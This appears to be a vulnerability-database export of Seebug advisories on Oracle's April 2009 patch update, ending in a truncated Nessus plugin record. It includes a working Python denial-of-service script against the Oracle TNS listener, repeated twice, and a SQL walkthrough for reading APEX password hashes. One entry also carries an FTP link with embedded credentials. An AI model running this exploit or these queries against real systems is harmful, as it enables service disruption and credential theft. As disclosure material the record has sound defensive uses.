{"seebug": [{"lastseen": "2017-11-19T18:53:43", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 34461\r\nCVE(CAN) ID: CVE-2009-0974,CVE-2009-0983,CVE-2009-0989,CVE-2009-0990,CVE-2009-0993,CVE-2009-0994,CVE-2009-0996,CVE-2009-1008,CVE-2009-1009,CVE-2009-1010,CVE-2009-1011,CVE-2009-1017,CVE-2009-0995,CVE-2009-0999,CVE-2009-1000,CVE-2009-1001,CVE-2009-1002,CVE-2009-1003,CVE-2009-1004,CVE-2009-1005,CVE-2009-1006,CVE-2009-1012,CVE-2009-1016,CVE-2009-0972,CVE-2009-0973,CVE-2009-0975,CVE-2009-0976,CVE-2009-0977,CVE-2009-0978,CVE-2009-0979,CVE-2009-0980,CVE-2009-0981,CVE-2009-0984,CVE-2009-0985,CVE-2009-0986,CVE-2009-0988,CVE-2009-0991,CVE-2009-0992,CVE-2009-0997,CVE-2009-0982,CVE-2009-0998,CVE-2009-1013,CVE-2009-1014,CVE-2009-0189,CVE-2009-0190\r\n\r\nOracle Database is a large commercial database system.\r\n\r\nOracle released its April 2009 Critical Patch Update advisory, which fixes multiple vulnerabilities in multiple Oracle products. These vulnerabilities affect all security properties of Oracle products and can lead to local and remote threats. Some of them may require various levels of authorization, while others require none. The most severe vulnerabilities may lead to complete compromise of the database system.\r\n\r\n1) A format string error exists in the Oracle Process Manager and Notification (opmn) daemon; a remote attacker can cause arbitrary code execution by submitting a specially crafted POST request to port 6000/TCP.\r\n\r\n2) 
Because input passed to the DBMS_AQIN package is not properly filtered, a remote attacker can carry out a SQL injection attack by submitting a malicious query request.\r\n\r\n3) An error in the Application Express component bundled with Oracle Database may allow unprivileged users to disclose the APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\r\n\r\n4) A remote attacker can trigger a heap overflow by submitting a malicious HTTP request to the WebLogic Server plug-in.\r\n\r\n5) The WebLogic Server plug-in has a stack overflow vulnerability when parsing SSL certificates.\n\nOracle Application Server 10.1.2.3.0\r\nOracle E-Business Suite 12.0.6\r\nOracle E-Business Suite 11.5.10.2\r\nOracle Database 9.2.0.8DV\r\nOracle Database 9.2.0.8\r\nOracle Database 11.1.0.7\r\nOracle Database 11.1.0.6\r\nOracle Database 10.2.0.4\r\nOracle Database 10.2.0.3\r\nOracle Database 10.1.0.5\r\nOracle PeopleSoft Enterprise PeopleTools 8.49\r\nOracle WebLogic Server 9.2\r\nOracle WebLogic Server 9.1 GA\r\nOracle WebLogic Server 9.0 GA\r\nOracle WebLogic Server 8.1\r\nOracle WebLogic Server 7.0\r\nOracle WebLogic Server 10.3\r\nOracle PeopleSoft Enterprise HRMS 9.0\r\nOracle PeopleSoft Enterprise HRMS 8.9\r\nOracle Outside In SDK HTML Export 8.3.0\r\nOracle Outside In SDK HTML Export 8.2.2\r\nOracle XML Publisher 5.6.2\r\nOracle XML Publisher 10.1.3.2.1\r\nOracle XML Publisher 10.1.3.2\r\nOracle BI Publisher 10.1.3.4\r\nOracle BI Publisher 10.1.3.3.3\r\nOracle BI Publisher 10.1.3.3.2\r\nOracle BI Publisher 10.1.3.3.1\r\nOracle BI Publisher 10.1.3.3.0\r\nOracle WebLogic Portal 8.1\r\nOracle Data Service Integrator 10.3.0\r\nOracle AquaLogic Data Services Platform 3.2\r\nOracle AquaLogic Data Services Platform 3.0.1\r\nOracle 
AquaLogic Data Services Platform 3.0\r\nOracle JRockit R27.6.2\n Oracle\r\n------\r\nOracle has released a security advisory (cpuapr2009) and corresponding patches for this:\r\ncpuapr2009: Oracle Critical Patch Update Advisory - April 2009\r\nLink: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html?_template=/o", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5060", "id": "SSV:5060", "title": "Oracle April 2009 Critical Patch Update fixes multiple vulnerabilities", "type": "seebug", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:50:50", "bulletinFamily": "exploit", "description": "Bugtraq ID: 34994\r\nCVE ID: CVE-2009-1009\r\nCVE-2009-1010\r\nCVE-2009-1011\r\nCNCVE ID: CNCVE-20091009\r\nCNCVE-20091010\r\nCNCVE-20091011\r\n\r\nOracle Outside In is a software development kit (SDK) suite that gives developers a comprehensive solution for accessing, converting and controlling the content of more than 400 unstructured file formats.\r\nOracle Outside In contains multiple buffer overflows; a remote attacker can exploit them to execute arbitrary instructions with the privileges of the application.\r\n- The function that processes specific records in Microsoft 
Excel spreadsheet files is vulnerable: it reads an integer value contained in the file and later uses that value in integer arithmetic; because the value is not validated, an integer overflow can be triggered.\r\n- Proper bounds checking is missing when some records in Microsoft Excel spreadsheets are processed; data is copied from a heap buffer to a stack buffer without sufficient checks, which can corrupt the stack and lead to arbitrary code execution.\r\n- When a specially crafted Excel spreadsheet file is processed, an array of structures stored on the stack is used in a looped multiplication operation without sufficient bounds checking; a file containing well-formed but malicious records triggers the vulnerability when a user is induced to open it.\r\n- Multiple integer overflows exist in the handling of optional data streams stored in various files. Integer values read from the file are used in integer arithmetic without sufficient validation.\n\nOracle Outside In SDK HTML Export 8.3\r\nOracle Outside In SDK HTML Export 8.2.2\r\nOracle Outside In 8.3.0.5129\r\nOracle Outside In 8.2.2.4866\r\nOracle Outside In 8.1.9.4417\r\nOracle Outside In 8.1.5.4282\r\nGood Technologies Good Mobile Messaging Server for Exchange 6.0.0.106\r\nGood Technologies Good Mobile Messaging Server for Exchange 5.0.4.28\r\nGood Technologies Good Mobile Messaging Server for Exchange 4.9.3.41\n 
Vendor solution\r\nUpgrade to the latest version:\r\nGood Technologies Good Mobile Messaging Server for Exchange 5.0.4.28\r\nGood Technologies gmm_server_exchange_5_0_4_53_HotFix.exe\r\nftp://goodcust:g00d4Me!@ftp.good.com/gmm_server_exchange_5_0_4_53_HotFix.exe\r\nGood Technologies Good Mobile Messaging Server for Exchange 6.0.0.106\r\nGood Technologies gmm_server_exchange_6_0_0_125_hotfix.exe\r\nftp://goodcust:g00d4Me!@ftp.good.com/gmm_server_exchange_6_0_0_125_hotfix.exe", "modified": "2009-05-20T00:00:00", "published": "2009-05-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11362", "id": "SSV:11362", "type": "seebug", "title": "Oracle Outside In multiple buffer overflow vulnerabilities", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:53:01", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17919", "id": "SSV:17919", "title": "Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)", "type": "seebug", "sourceData": "\n \r\n# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>\r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n# 
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00"\r\n\t"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45"\r\n\t"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44"\r\n\t"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65"\r\n\t"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08"\r\n\t"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32"\r\n\t"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00"\r\n\t"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00"\r\n\t"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36"\r\n\t"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42"\r\n\t"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00"\r\n\t"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00"\r\n\t"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac"\r\n\t"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00"\r\n\t"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\
x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3"\r\n\t"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e"\r\n\t"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00"\r\n\t"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00"\r\n\t"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09"\r\n\t"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f"\r\n\t"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00"\r\n\t"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00"\r\n\t"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00"\r\n\t"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f"\r\n\t"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d"\r\n\t"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b"\r\n\t"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c"\r\n\t"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00"\r\n\t"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00"\r\n\t"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00"\r\n\t"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43"\r\n\t"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d"\r\n\t"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72"\r\n\t"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x
6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e"\r\n\t"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61"\r\n\t"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f"\r\n\t"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d"\r\n\t"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c"\r\n\t"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22"\r\n\t"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22"\r\n\t"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00"\r\n)\r\n\r\nsockobj.close()\r\n\r\n# milw0rm.com [2009-04-21]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17919"}, {"lastseen": "2017-11-19T16:01:34", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66468", "id": "SSV:66468", "title": "Oracle RDBMS 10.2.0.3/11.1.0.6 - TNS Listener PoC", "type": "seebug", "sourceData": "\n # TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>\r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n# 
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00"\r\n\t"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45"\r\n\t"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44"\r\n\t"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65"\r\n\t"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08"\r\n\t"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32"\r\n\t"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00"\r\n\t"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00"\r\n\t"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36"\r\n\t"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42"\r\n\t"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00"\r\n\t"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00"\r\n\t"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac"\r\n\t"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00"\r\n\t"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\
x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3"\r\n\t"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e"\r\n\t"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00"\r\n\t"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00"\r\n\t"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09"\r\n\t"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f"\r\n\t"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00"\r\n\t"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00"\r\n\t"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00"\r\n\t"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f"\r\n\t"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d"\r\n\t"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b"\r\n\t"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c"\r\n\t"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00"\r\n\t"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00"\r\n\t"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00"\r\n\t"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43"\r\n\t"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d"\r\n\t"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72"\r\n\t"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x
6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e"\r\n\t"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61"\r\n\t"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f"\r\n\t"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d"\r\n\t"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c"\r\n\t"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22"\r\n\t"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22"\r\n\t"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00"\r\n)\r\n\r\nsockobj.close()\r\n\r\n# milw0rm.com [2009-04-21]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66468"}, {"lastseen": "2017-11-19T18:58:58", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-04-17T00:00:00", "published": "2009-04-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11029", "id": "SSV:11029", "type": "seebug", "title": "Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes", "sourceData": "\n Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\r\n\r\nName \t\t\tUnprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\r\nSystems Affected \tAPEX 3.0 (optional component of 11.1.0.7 installation)\r\nSeverity \t\tHigh Risk\r\nCategory \t\tPassword Disclosure\r\nVendor URL \t\thttp://www.oracle.com/\r\nAuthor \t\t\tAlexander Kornbrust (ak at red-database-security.com)\r\nCVE 
\t\t\tCVE-2009-0981\r\nAdvisory \t\t14 April 2009 (V 1.00)\r\n\r\n\r\nDetails\r\nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\r\nTested on 11.1.0.7.\r\n\r\nC:\\> sqlplus dummy/dummy\r\nConnected to:\r\nOracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production\r\nWith the Partitioning, OLAP, Data Mining and Real Application Testing options\r\n\r\nSQL> select granted_role from user_role_privs;\r\n\r\nGRANTED_ROLE\r\n------------------------------\r\nCONNECT\r\n\r\n\r\nSQL> select owner,table_name from all_tables where owner='FLOWS_030000';\r\n\r\nOWNER TABLE_NAME\r\n------------------------------ ------------------------------\r\nFLOWS_030000 WWV_FLOW_DUAL100\r\nFLOWS_030000 WWV_FLOW_LOV_TEMP\r\nFLOWS_030000 WWV_FLOW_TEMP_TABLE\r\n\r\n\r\n\r\nGet a list of all columns containing the string "%PASSWORD%'\r\n\r\nSQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';\r\n\r\nOWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME\r\n--------------------------------------------------------------------------------\r\nFLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE\r\nFLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED\r\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW\r\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2\r\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE\r\n\r\n9 rows selected.\r\n\r\n\r\nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS\r\n\r\nUSER_NAME WEB_PASSWORD2\r\n--------------------------------------------------------------------------------\r\nYURI 141FA790354FB6C72802FDEA86353F31\r\n\r\nThis password hash can be checked using a tool like Repscan.\r\n\r\n\r\nPatch Information\r\nApply the patches for 
Oracle CPU April 2009.\r\n\r\n\r\nHistory\r\n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Advisory published\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11029", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:12:29", "bulletinFamily": "scanner", "description": "The remote Oracle database server is missing the April 2009 Critical\nPatch Update (CPU) and therefore is potentially affected by security\nissues in the following components :\n\n - Advanced Queuing\n\n - Application Express\n\n - Cluster Ready Services\n\n - Core RDBMS\n\n - Database Vault\n\n - Listener\n\n - Password Policy\n\n - Resource Manager\n\n - SQLX Functions\n\n - Workspace Manager", "modified": "2018-11-15T00:00:00", "published": "2011-11-16T00:00:00", "id": "ORACLE_RDBMS_CPU_APR_2009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56064", "title": "Oracle Database Multiple Vulnerabilities (April 2009 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (!defined_func(\"nasl_level\") || nasl_level() < 5000) exit(0, \"Nessus older than 